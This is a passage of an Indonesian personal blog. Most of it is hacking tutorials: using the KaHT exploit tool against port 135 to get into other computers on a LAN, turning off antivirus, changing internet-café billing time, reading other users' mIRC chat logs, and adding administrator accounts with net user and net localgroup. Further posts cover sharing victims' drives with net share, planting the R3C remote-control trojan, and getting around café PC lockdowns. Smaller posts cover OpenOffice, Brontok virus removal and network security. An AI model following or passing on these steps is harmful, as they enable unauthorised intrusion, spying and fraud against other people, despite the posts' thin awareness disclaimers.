Tutorial OpenOffice

Posted on 02.33 by CS-31

Tau g kalo sekarang orang-orang menganggap Open Office merupakan solusi tepat untuk software pengetikan/aplikasi perkantoran. di kuliahanku juga dosen menyuruh membuat tutorial tentang openoffice. mengapa harus openoffice. karena menurut para peneliti....

wewewewewe peneliti...



katanya kalo open office merupakan software murah meriah... kantong orang miskin,... meski orang miskin punya komputer..ehehhe


nah kalo kamu pengen tau cara gunain open office itu gimana dih tak kasih tutorial tentang open office yang aku dapet dari mbah google....hehehehhe

download disni yoooo

writer
impres
cal
base

Memasuki Komputer orang lain

Posted on 22.57 by CS-31

nda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu

internet Maniac (Internet Maniac.exe) ... Download Interenet Maniac
Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname

KaHT (KaHt.exe) ... Download program hacker KaHT
Berfungsi sebagai program untuk menerobos ke computer server atau client

Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe

Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pakek WINZIP atau pakek apa.
Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara.

Untuk Windows XP
Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan.

Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) :)
Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul
(Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja)

Setelah kamu dapetin sasaran computer yang mau di masukin / diremote maka kamu langsung aja kamu jalankan program Internet Maniac
Download IManiac......

Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki.

Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat.

Cara masuk DOS Mode
Untuk Windows XP :
Masuklah ke Start, All programs, Accessories lalu Command Prompt
Untuk Windows 95/98/Me/NT/2000
Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt

Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaHT) maka ketikkan “CD\KaHT” dan seterusnya.

Jika sudah, ini saatnya…

Ketikkan “KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran.
kalau bingung bisa begini : "KaHT Ip1 ip2"
ip1 : ip awal yang discan
ip2 : ip terahkir yang discan

Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja “KaHT 192.168.0.0 192.168.0.1” lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe

Nah kalo udah begini kita bisa berkreasi :

Pingin biaya warnet kita lebih murah ?
gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe.

Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat “/logs” maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan.

Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe.

Diatas cuman kreasi dikit aja, kamu bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas

Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab..

Penulis :
Jogjahacking

Referensi :
1. Yogya Family Code
2 .Jasakom.com

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Membuat akses administrator Windows untuk kita lewat komputer lain

Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik.

Melihat akses guest dan administrator di Windows
Ketik : net user

Melihat aktif tidaknya guest di Windows
Ketik : net user guest

Membuat akses guest menjadi Administrator dengan perintah :
Ketik : net localgroup Administrators Guest /add

Membuat akses adminstrator sendiri :
1. Ketik : net user /add
2. Ketik : net localgroup Administrators /add

Menghapus akses administrator
Ketik : net localgroup Users /delete

Penulis :
jogjahacking

Referensi :
1. y3dips dari situs Echo.or.id

*Segala kesalahan error / kerusakan pada komputer dan semacamnya adalah tanggung jawab anda !
*Semua yang anda pelajari dan anda lakukan adalah sepenuhnya tanggung jawab anda tanpa kecuali (termasuk member)

Cara melakukan share di komputer lain (2000/XP) secara bebas

Pada tanggal 06 Januari 2005, penulis menemukan teknik baru cara melakukan share dikomputer sasaran secara bebas di Windows XP, yang dimana waktu itu penulis penasaran melihat isi share dengan perintah ///c$ (Default Share) yang sebelumnya lancar bisa masuk di drive C komputer sasaran, tiba-tiba setelah komputer sasaran diinstall ulang dan ditambah settingan, membuat penulis tidak dapat masuk lagi dengan perintah ///c$ dimana jika dijalankan perintah tersebut maka muncul sebuah form untuk memasukkan password.

Dikomputer sasaran, penulis udah periksa ternyata akses password admin tidak dipassword juga tidak ada password di folder-folder lain yang share, tapi tetap saja di komputer sasaran meminta password, tapi dengan rasa pusing memikirkan ini ahkirnya penulis coba-coba masuk ke Help, disitu pada search penulis tulis c$, ahkirnya setelah ditunggu ahkirnya pada Search Results, di nomor 9 ada tulisan "Net Share" karena tulisan ini lebih sesuai topik maka penulispun masuk.kedalam ahkirnya di net share ini banyak membuka cakrawala pengetahuan penulis, dengan penemuan ini maka penulis jadi mempunyai ide cemerlang cara membuat share drive c, drive d atau folder-foldernya apa saja di komputer sasaran.

Bagaimana caranya ?
Siapkan program KaHT, kita terapkan lagi ilmu ini, lalu setelah kita masuk di komputer sasaran dengan KaHT maka kita ketikkan perintah : "Net Share =c:\" dengan perintah ini maka drive c akan dishare, jika anda takut ketahuan dengan user yang makek komputer itu, maka share saja foldernya, misalnya kita ingin menshare folder c:\windows caranya ketik "Net Share =c:\windows, oh iya bisa ditulis terserah anda dimana nantinya ini sebagai identitas nama untuk drive atau folder yang dishare.

Ahkirnya dengan tutorial ini maka penulis mengakiri tanda tanya para pengguna KaHT yang ingin mengambil files dari komputer sasaran atau pengcopyan files ke komputer sasaran, dengan cara seperti ini maka kita bisa memanfaatkan komputer sasaran lebih jauh seperti memasang trojan, backup data ke komputer lain bahkan teknik cara mematai-mata teman chatting disatu warnet yang ditulis oleh penulis di Jasakom sebelumnya menjadi lebih mudah karena kita tinggal menshare folder mircnya saja dan kita mengubah file "mirc.ini" di notepad saja. :)

Berkenalan dengan Trojan R3C

Sebelum bicara lebih jauh tentang trojan R3C, penulis tidak bertanggung jawab atas penyalahgunaan artikel ini. artikel ini hanya untuk pembelajaran dan menambah wawasan saja.

Untuk lebih lancarnya proses pembelajaran sebaiknya download dulu trojan yang kita sayangi ini.Anda dapat mendownloadnya di r3c download .setelah trojan berhasil di download, akan terlihat 2 buah file yaitu client.exe dan servavi.exe. File servavi merupakan program yang ada dalam komputer target sedangkan program client.exe merupakan sebagai program yang kita pegang sebagai remote. Sebenarnya permasalahan yang timbul adaalh bagaimana kita tahu bahwa suatu komputer telah tertanam trojan R3C ini.

OK sekarang buka dulu program client.exe,untuk mengetahui komputer yang sudah tertanam trojan ini kita tinggal melakukan scan IPs. Klo hasil scan sudah didapat, tinggal kita masukkan no IP komputer target ke program clien kita, terus bagaimana klo hasil scan tidak menunjukkan hasil apa2.....? Gmn ya....? tenang saja banyak jalan menuju roma, kita pasang aja sendiri program servavi.exe itu. Cara masuk dan menaruh prog servavi.exe itu bisa dilakukan dengan beberapa program remote port scan antara lain legion, netcop, superscan dan lain lain (nanti cari di google sendiri ya....). Klo sudah bisa masuk ke komputer target tinggal klik 2 kali program servavi.exe itu, dan klo program itu sudah ada dikomputer target tinggal kita kerjain aja.(ups...becanda..ini Cuma pembelajaran) .

Ok sekarang kita lihat dulu menu menu yang ada pada trojan ini...
1. capture screen untuk melakukan capture, dengan ini kita dapat mengetahui apa yang sedang dikerjakan atau yang di buka oleh korban.
2. message function berguna untuk menampilkan pesan kepada komputer korban.
3. Policies berfungsi untuk melakukan perubahan pada registry dengan beberapa list yang sudah disediakan oleh trojan ini
4. execute berguna untuk membuka program yang kita inginkan dengan mengetikkan contoh c:\windows\calc
5. Open URL berguna untuk membuka alamat suatu website pada komputer korban
6. Display BMP untuk menampilkan file gambar dengan format BMP
7. Server info untuk menampilkan informasi komputer korban
8. Redraw screen berguna untuk menghilangkan list hasil manipulasi yang telah dibuat.
9. Don't Click!!! Berguna untuk menghilangkan server trojan ini.
10. Pilihan shutdown untuk melakukan shutdown pada komputer korban.
11. Pilihan restart untuk melakukan proses restart pada komputer target
Sebenarnya masih banyak manipulasi atau hal2 yang kita inginkan (ato yang tidak diinginkan oleh korban he...he...), untuk lebih jelasnya lihat sendiri dan buktikan sendiri.

Mungkin apabila anda belum punya target, bisa coba komputer sendiri dirumah tp ingat matikan dulu program anti virusnya krn trojan ini belum diimunisasi he...he...(becanda). Percobaan yang dilakukan penulis trojan ini hanya bekerja pada windows 9x untuk win XP belum bisa, mungkin suatu saat.

Untuk temen2 yang melakukan percobaan dengan komputer sendiri saatnya untuk menghilangkan trojan itu. Biar nanti tidak dikatakan kurang bertanggung jawab.Caranya :
1. Hapus file IPMON.EXE dan WINSOCK.EXE yang terdapat pada c:\windows\system
2. Buka run, ketik msconfig, system configuration utility akan muncul dan klik tab startup, hilangkan centang pada ipmon.exe. Sekarang klik tab system.ini, pilih tanda + pada boot, akan muncul banyak pilihan tp yang kita lihat hanya pada shell=Explorer.exe winsock.exe, klik data tersebut lalu edit menjadi shell=Explorer.exe.

Udah selesai, berarti penulis sudah tidak disalahkan lagi.

Mengontrol komputer lain pada Windows XP dengan gabungan Remote & Trojan

Penulis kali ini akan lebih menyempurnakan tutorial yang diterbitkan oleh banyak penulias sebelumnya yang beredar, yang berjudul "Berkenalan dengan Trojan R3C",dimana Trojan R3C ini dapat kita gabungkan dengan program kesayangan kita yaitu KaHT. Sebagai informasi saja bahwa sebelumnya program ini sudah diujicoba antar jaringan LAN di tempat penulis sendiri dengan hasil yang memuaskan.

Perlu diketahui kedua program (KaHT dan R3C) ini memang terdetect oleh AntiVirus sebagai Trojan maka nonaktifkan dahulu AntiVirusnya. :)

Baik kita mulai saja mempraktekkan gabungan KaHT dengan R3C yang bisa dikatakan cukup serasi, pertama kita jalankan program KaHT seperti biasa, setelah kita berada di komputer sasaran, kita lihat apakah komputer sasaran di share komputernya ? biasanya diwarnet-warnet Yogya di share di drive Dnya :P, walaupun tidak disharepun bisa juga melakukan share sendiri dengan cara dapat melihat tulisan saya dengan judul "Melakukan share dikomputer lain secara secara bebas pada Windows XP".

Setelah itu kita copykan file servapi.exe ke komputer sasaran lewat sharing, jika sudah dicopy dikomputer sasaran, kita kembali ke KaHT tadi, misalkan saja tadi program servapi.exe ada di drive D, cukup kita panggil saja program client.exe, menurut pengalaman saya, kita panggil beberapa kali file ini, karena pernah satu kali saja tapi ternyata trojannya belum mau jalan. :P

Setelah kita menjalankan program client.exe di komputer sasaran, sekarang tinggal kita jalankan program client.exe di komputer kita untuk mengontrol komputer sasaran.

Sekarang kita pilih Scan IPs..., lalu akan muncul tampilan sebagai berikut

Kita isi Get IP by Hostname dengan nama computer sasaran lalu klik arah panan kekanan dan hasilnya muncul ip addreas computer sasaran lalu kita klik arah panah keatas, kalo udah kita klik Start, setelah selesai prosesnya kita klik Exit lalu kita kita isi pada IP/name dengan ip addreas atau nama computer kita lalu kita klik Connect! dan muncul tampilan seperti dibawah ini :

Kalau udah begini kita bisa ngapain aja pada komputer sasaran, dari ngambil gambar apa yang sedang dilakukan user di komputer (capture screen), ngirim pesan ke user komputer sasaran (message function), merubah registry windows komputer sasaran, menjalankan program apa saja yang kita inginkan dikomputer sasaran, memaksa komputer sasaran membuka alamat situs tertentu, melakukan shutdown pada komputer sasaran, melakukan restart dan masih banyak lagi.

Mengetahui ip adress lawan chating

Posted on 22.54 by CS-31

Dalam artikel ini akan membahas hal-hal berikut:

1. Melacak alamat IP suatu situs

2. Melacak Real Adress server suatu situs

3. Cara Mengetahui IP address lawan chatting kita

(:::::—– Pembahasan —–::::

1. Melacak alamat IP suatu situs Untuk mengetahui alamat IP suatu situs, kita dapat melakukan PING terhadap situs tersebut. Caranya: Masuk ke command Prompt dan ketikan PING WWW.SITUS-YANG-DILACAK.COM lalu tekan enter. Maka akan muncul alamat Ip situs tersebut.

2. Melacak Lokasi server (real address) suatu situs Kita dapat melacak lokasi server suatu situs hanya dengan mengetahui alamat situsnya saja. Coba anda buka www.domainwhitepages.com Tinggal masukkan IP address situs tadi atau masukkan alamat situsnya dan anda akan mendapatkan info lengkap tentang server dari situs tersebut diantaranya adalah lokasi negara dan kota.

3. Melacak IP address lawan chatting kita Saat kita menggunakan Yahoo messenger, sebenarnya kita bisa mengetahui alamat IP dari lawan chatting kita. Caranya: :: Kirimkan suatu file pada lawan chat kita. :: Lalu masuklah ke Command Prompt (MSDOS) dan ketikkan NETSTAT -N lalu tekan enter, maka alamat IP lawan chatting anda (yang telah anda kirimi file tadi) akan muncul beserta port yang digunakan untuk pengiriman file. :: Untuk mengetahui lokasi lawan chatting anda (real address) seperti ia berada di kampus atau di warnet mana, tinggal anda chek di www.domainwhitepages.com dengan mempergunakan alamat IP yang anda dapatkan.

*Ingin menggunakan YM untuk beberapa user id di komputer yang sama? Anda bisa menggunakan software dan juga bisa dengan trik di bawah ini:

1. Start > Run…> regedit

2. Buka HKEY_CURRENT_USER > Software > yahoo > pager > test

3. Pada sebelah kanan, klik kanan > New > DWORD value

4. Beri nama Plural tekan enter 2 kali dan berikan nilai 1

5. Pastikan YM anda telah dimatikan, jalankan YM dan login secara biasa.

6. Kalau masih tidak bisa coba lagi step ke-5, kalau masih tidak bisa RESTART Tutorial Hacker Part 2 :

Melacak ip addreas di yahoo Mesengger dan mesengger lainnya Banyak para Newbie tidak tahu cara menampilkan ip addreas teman chatnya di Yahoo Messenger, AOL dan lainnya, memang untuk melakukannya kita butuh triks, berbeda dengan IRC yang tinggal di whois aja, baik langsung saja kita memulai tutorialnya, pertama-tama kirimkankan file apa saja yang anda punya ke teman chatting anda dimana ini fungsinya sebagai timing waktu agar anda punya waktu untuk mengetikkan perintah-perintah untuk menampilkan ip addreas teman chat anda, disarankan diatas 600kb, lebih besar itu lebih bagus karena itu akan menyebabkan waktu anda lebih banyak.

1.Segera buka MS-DOS anda, lalu ketikkan netstat -n lalu akan tampil ip teman chat anda, misalkan saja muncul tampilan sebagai berikut : 202.133.80.45 : 5000+++ ->> ip ini ( 202.133.80.45) ternyata setelah dicek itu milik Graha Net, nah ahkirnya ketahuan tuh si pemakai messenger di warnet mana, nah kalau 5000+ itu adalah portnya yang dikirimin file ama anda. Tujuan dari tutorial ini bahwa segala macam komunikasi diinternet tanpa penggunaan proxy dan semacamnya masih dapat dilacak dengan begitu mudahnya, sehingga gue mengingatkan untuk penggunaan proxy anonymous setiap anda berselancar di internet jika anda benar-benar ingin mengurangi resiko dari berbagai jenis pelacakan.

2. Cara masuk ke DOS pada Windows XP yang serba dikunci Banyak warnet yang membatasi akses gerak kita di Windows seperti fasilitas DOS, Windows Explorer, setting dan sebagainya dalam keadaan tidak dapat kita sentuh, huh, emang nyebelin kalo kita bener-bener perlu akses ini Gue punya jawaban Cara masuk di DOS pada Windows XP yang serba di lock fasilitasnya :

1. Pada icon dalam dekstop atau start menu di klik kanan, lalu pilih properties

2. Di properties pilihlah "find target…"

3. Muncul Window lalu pilih search diatas

4. Pada Search pilihlah "All Files and folders"

5. Lalu cari file "cmd.exe" di windows

6. Jika di temukan maka jalankan file cmd.exe.

7. Dengan menjalankan file cmd.exe maka anda telah masuk ke dos Jika ternyata penguncian benar-benar total maka anda dapat mengubah registry windows melalui pembuatan file *.reg dengan notepad / word pad, kemudian anda jalankan file *.reg tersebut, cara untuk membuatnya ada dihalaman ini juga. Tujuan dari tutorial ini agar kita dapat lebih banyak bergerak leluasa diwarnet-warnet yang keamanannya terlalu dilindungi sehingga membuat kita tidak bisa berbuat banyak di komputer tersebut.

3. Menembus fasilitas umum windows yang terlalu dibatasi Menjengkelkan jika fasilitas MS-DOS, RUN, Find dan sebangsanya di hilangkan dari desktop di komputer warnet, biar ga terlalu BT, kita tembus aja pakek cara ini

1. Masuk ke Notepad / Wordpad / Ms Word

2.Laluketik dibawah ini REGEDIT4 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System] "DisableRegistryTools"=dword:00000001 [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoRun"=dword:00000000

3. Simpanlah di dengan nama file berekstensi *.reg lalu jalankan file *.reg yang anda buat tadi lalu anda restart Tujuan dari tutorial ini untuk para netter yang merasa kesal dengan komputer warnet, kantor atau sebagainya yang dimana warnet, kantor atau lainnya melakukan pembatasan hak aksesnya terlalu berlebihan terhadap komputer yang kita gunakan.

4. Cara masuk di komputer lain lewat DOS (Windows XP / 2000) Anda ingin masuk dikomputer teman anda dalam sebuah LAN ? bisa melihat seluruh isi harddisk teman anda, membuat directory, membuat file, mendelete file atau apa saja ? itu mudah, semua caranya ada disini.

1.Pertama-tama anda harus tahu 2 program penting lalu downloadlah yaitu internet Maniac (Internet Maniac.exe) … Download Interenet Maniac Berfungsi untuk mengetahui ip addreas client melalui computer name / hostname KaHT (KaHt.exe) … Download program hacker KaHT Berfungsi sebagai program untuk menerobos ke computer server atau client Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Ingat hanya dengan 2 program diatas maka anda bersiap-siaplah menguasai warnet / kampus / kantor dan sebagainya, lho bagaimana bisa ? hehe Setelah 2 program diatas di download maka ekstractlah dahulu program tersebut, entah pake WINZIP atau pake apa. Kalo udah di extract lalu pertama kali anda periksa dahulu jaringan anda dengan melihat para hostname dengan 2 cara. Untuk Windows XP Cara Pertama Masuk ke Start Lalu Search, lalu pilih computers or people lalu pilih A computer on the Network lalu langsung klik search maka akan segera muncul computer-komputer yang terkoneksi dalam jaringan. Untuk Windows 95/98/Me/2000 (kalau anda menemukan open port 135 di OS ini) Cara Pertama Masuk ke Start Lalu Search Lalu For Files or Folders lalu pada menu Search for other item pilihlah computers, lalu akan muncul Search for computer, maka langsung klik Search Now maka nama-nama computer akan muncul (Alternatif cara yang cepat dapat mengklik My Network Place / Network Neighboure saja) Setelah loe dapetin sasaran computer yang mau di masukin / diremote maka loe langsung aja jalankan program Internet Maniac Masuklah ke Host Lookup lalu ketikkan nama computer / hostname lalu klik resolve, disini anda akan mendapat alamat ip computer tersebut. Dengan nomor ip ini maka anda sudah mengetahui sasaran computer yang akan di masuki. Setelah itu selesai maka kita tinggalkan program Internet Maniac, kita akan berlanjut dengan program KaHT, program ini akan didetect sebagai Trojan oleh antivirus, tapi abaikan saja, jangan di hapus / di karantina kalau terdetect, kalau perlu del aja antivirusnya, satu lagi, program KaHT bekerja dalam MS-DOS Mode jadi disini kemampuan anda menggunakan DOS sangat penting, tanpa kemampuan DOS maka anda tidak akan bisa banyak berbuat. Cara masuk DOS Mode Untuk Windows XP : Masuklah ke Start, All programs, Accessories lalu Command Prompt Untuk Windows 95/98/Me/NT/2000 Masuklah ke Start, Programs, Accessories lalu MS-DOS Prompt Setelah berhasil masuk DOS maka masuklah di directory program KaHT, masa seh bisa lupa tadi program diextract dimana, hehe, (Misal tadi di extract di C:\KaH) maka ketikkan "CD\KaHT" dan seterusnya. Jika sudah, ini saatnya? Ketikkan "KaHT sebelum_no_ip_komputer_sasaran no_ip_komputer_sasaran. kalau bingung bisa begini : "KaHT Ip1 ip2" ip1 : ip awal yang discan ip2 : ip terahkir yang discan Misalnya tadi ip-nya 192.168.0.1 setelah di detect pakek Internet Maniac tadi itu lho. Maka ketikkan saja "KaHT 192.168.0.0 192.168.0.1" lalu enter aja Nah disini nanti program akan bekerja otomatis. Setelah selesai menscan jika nanti port 135 ternyata dalam keadaan open maka anda akan otomatis di computer tujuan / sasaran, untuk lebih persisnya anda akan berada di "c:\windows\system" milik komputer tujuan / sasaran setelah pen-scan-an selesai. Anda bisa bebas di computer sasaran, mau edit atau di delete pun bisa, hehe Nah kalo udah begini kita bisa berkreasi : Pingin biaya warnet kita lebih murah ? gampang masuk aja di billing server, ketik Time, ganti aja waktunya, tapi jangan banyak-banyak apalagi minus nanti ketahuan ama operator warnetnya, hehe. Memata-matai anak yang sedang chatting pakek MiRC di satu warnet / kampus / kantor / lainnya, cari program MiRC yang digunakan dalam computer tersebut, biasanya seh di C:\Program Files\MiRC, buka file MiRC.INI, lalu Log IRC di On kan saja dan kalo mau lihat isi chattingan teman kita itu cukup lewat "/logs" maksudnya kalau tadi di C:\program Files\MiRC program MiRCnya maka cukup masuk aja di C:\Program Files\MiRC\Logs nanti disitu ada file-file log hasil chattingan dia walaupun dia sedang online tetep aja terekam, hehe, kalo mau mastiin dia makek nick apa, gampang banget bisa jalanin aja MiRCnya atau periksa di MiRC.INI, gampangkan. Apalagi nih, Bikin computer itu rusak, lebih baik jangan, tapi sebenere bisa lho, delete aja file-file systemnya, hehe. Diatas cuman kreasi dikit aja, loe bisa aja memanfaatkannya jauh lebih bermanfaat dari pada diatas Tujuan dari tutorial ini untuk anda yang sering menggunakan komputer dengan Windows 2000 dan XP dijaringan agar lebih waspada terhadap berbagai tindakan usil dari pihak-pihak yang tidak bertanggung jawab.. 5.Membuat akses administrator Windows untuk kita lewat komputer lain Kita ingin membuat administrator Windows XP/2000 di komputer lain melalui LAN ? sangat mudah, caranya masuklah ke komputer tujuan dengan program kaht yang sudah diajarkan diatas, lalu kita akan mencoba beberapa trik. Melihat akses guest dan administrator di Windows Ketik : net user Melihat aktif tidaknya guest di Windows Ketik : net user guest Membuat akses guest menjadi Administrator dengan perintah : Ketik : net localgroup Administrators Guest /add Membuat akses adminstrator sendiri :

1. Ketik : net user /add

2. Ketik : net localgroup Administrators /add Menghapus akses administrator Ketik : net localgroup Users /delete 1. Cara mengetahui password administrator Windows - Download Proactive Windows Security Explorer
Comments (0)
Menangkal Virus Brontox
Filed under: Record

1) Jalankan komputer dengan menekan F5 saat booting(Beberapa Motherboard F2 atau F8). Pilih opsi safe mode command prompt only. Gunakan User non Administrator (Pada user ini Regedit langsung bisa dijalankan, sedang pada user lain tidak bisa dijalankan[block])

2) Aktifkan hijackThis dgn mengetik perintah hijackthis pada command prompt, lalu ENTER (Pastikan alamatnya benar) MIsal dari c:/> Sedang File HijackThis.exe ada di D:\AntiBrontok\HijackThis.exe So Dari C:/>D: [Enter] D:/>CD AntiBrontok [Enter] D:/AntiBrontok>HijackThis [Enter] nb: jalanin HijackThis dari USB langsung juga bisa kok

3) Check/contreng menu2 berikut: F2 - REG:System.ini:Shell=explorer.exe”C:\windows\eksplorasi.exe” 04 - HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:[Bron Spizaetus]”C:\windows\ShellNew\sempalong.exe” 04 - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run:[Tok-Cirrhatus]”C:\Documents and Settings\%Nama User%\Local Settings\Aplication Data\smss.exe 04 - StartUp:Empty.pif=? 07 - HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,DisableRegedit = 1 Tekan tombol Fix Cheked, lalu tekan Yes Klo ada Message Box muncul, OK-in aja.

4) Periksa lagi apakah semua sudah di-check. Kemudian, untuk menghapus backup registry yg dibuat oleh HijackThis, Klik tombol Config. Klik tombol Backups. Klik tombol Delete All. ————————————————————————————–

5) Kembali ke DOS prompt, ketik regedit, lalu ENTER.

6) Hapus entry2 registry berikut ini: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\explorer\No Folder Options HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\Disable CMD nb : di sini juga kita bisa memastikan bahwa entry2 registry pada langkah 3 sudah terhapus semuanya apa belum. Pernah juga kasus virus mengakibatkan shortcut windows+E yang seharusnya membuka explorer ternyata diblock alias di non aktifkan, cuman sayank aku blom tahu cara ngatasinya ————————————————————————————–

7) Kembali ke DOS prompt, ketik explorer, lalu ENTER. Ini akan mengaktifkan windows explorer Jika muncul message box, Yes aja.

Hapus Schedule Task yang dibuat oleh W32/RontokBro dengan cara men\delete file My Computer\Control Panel\Scheduled Task\At1.job (Atau dari command prompt, ketik del C:%windir%\Tasks\At1.job Ganti %windir% dengan windows pada win XP/98 atau winnt untuk windows 2000) Maaf ME blom pernah nyoba

9) Di Control Panel, masuk ke Folder Options. Pada tab View, Check menu2 berikut: [] Display the contents of system folder [] Show hidden files and folder Uncheck menu2 berikut: [] Hide extension for known file types [] Hide protected operating system files Klik OK ————————————————————————————–

10) Masih di windows explorer, masuk ke C:\Document and Settings\%user%\Local Settings\Application Data (Ganti %user% dengan nama USER kamu). Hapus semua file yang di dalam namanya ada tulisan “brontok”. Biasanya file2 tersebut adalah: Bron.tok - … Loc.Mail.Bron.Tok Ok-SendMail-Bron-tok

11) Masih di tempat yang sama, hapus juga file2 berikut: csrss.exe inetinfo.exe lsass.exe services.exe smss.exe winlogon.exe Kosong.Bron.Tok.txt

12) Delete file C:\Document and Settings\%user%\Templates\Brengkolang.com PERHATIAN: LAkukan cara 10) sampai 12) untuk semua USER yang pernah dipakai di komputer kamu sejak terinfeksi.

13) Delete file C:\WINDOWS\eksplorasi.exe Delete file C:\WINDOWS\SHELL NEW\sempalong.exe ————————————————————————————–

14) Restart, kali ini booting secara normal.

15) Sekarang kita akan menghapus file2 hasil infeksi. Untuk mudahnya, gunakan fasilitas search. Pada menu START, klik Search. Klik All files and folder. Pilih Look in All Drives Pada kolom All or part of file name, ketik: *.exe Klik More advance folder, check menu2 berikut: [] Search system folder [] Search hidden files and folders [] Search subfolder Klik Search

16) Hapus semua file application yang bentuk icon-nya folder. Tips: Kelompokkan berdasarkan size-nya krn size-nya sama. BIASANYA 42 KB. Hati2 jangan kecampur sama file lain pas dihapus. ————————————————————————————–

17) Pada file C:\autoexec.bat, klik kanan, klik edit. Hapus tulisan pause pada text field. Oh ya, harus diulang dari depan untuk memperbaiki registry jikalau terdapat beberapa user account dalam kompi yang sama. SELESAI Untuk mencobanya restart dulu baru test

vitual pc.......

Posted on 08.57 by CS-31

buat kamu-kamu yang pengen mengatahui tentang virtual pc


silakan download tutorial tentang virtual pc disini

Network security : apa dan bagaimana

Posted on 08.18 by CS-31

Seperti yang kita lihat di saat ini, Internet telah tumbuh dan berkembang hingga mencapai angka beberapa juta unit komputer yang terkoneksi di berbagai belahan dunia. Dari hari ke hari pula informasi yang terkandung di dalam jaringan Internet tersebut semakin lengkap, akurat, dan penting. . Informasi telah menjadi suatu asset yang sedemikian berharga sehingga perlu mendapat perlakuan yang lebih spesifik. Selain itu pula, kemajuan yang dicapai dalam bidang pengembangan sistem operasi komputer sendiri dan utulitasnya sudah sedemikian jauh dimana tingkat performansi, keandalan dan fleksibilitas software menjadi kriteria utama dalam proses pengembangan software. Dengan semakin penting dan berharganya informasi tersebut dan ditunjang oleh kemajuan pengembangan software, tentunya menarik minat para pembobol (hacker) dan penyusup (intruder) untuk terus bereksperimen guna menemukan dan mempergunakan setiap kelemahan yang ada dari konfigurasi sistem informasi yang telah ditetapkan

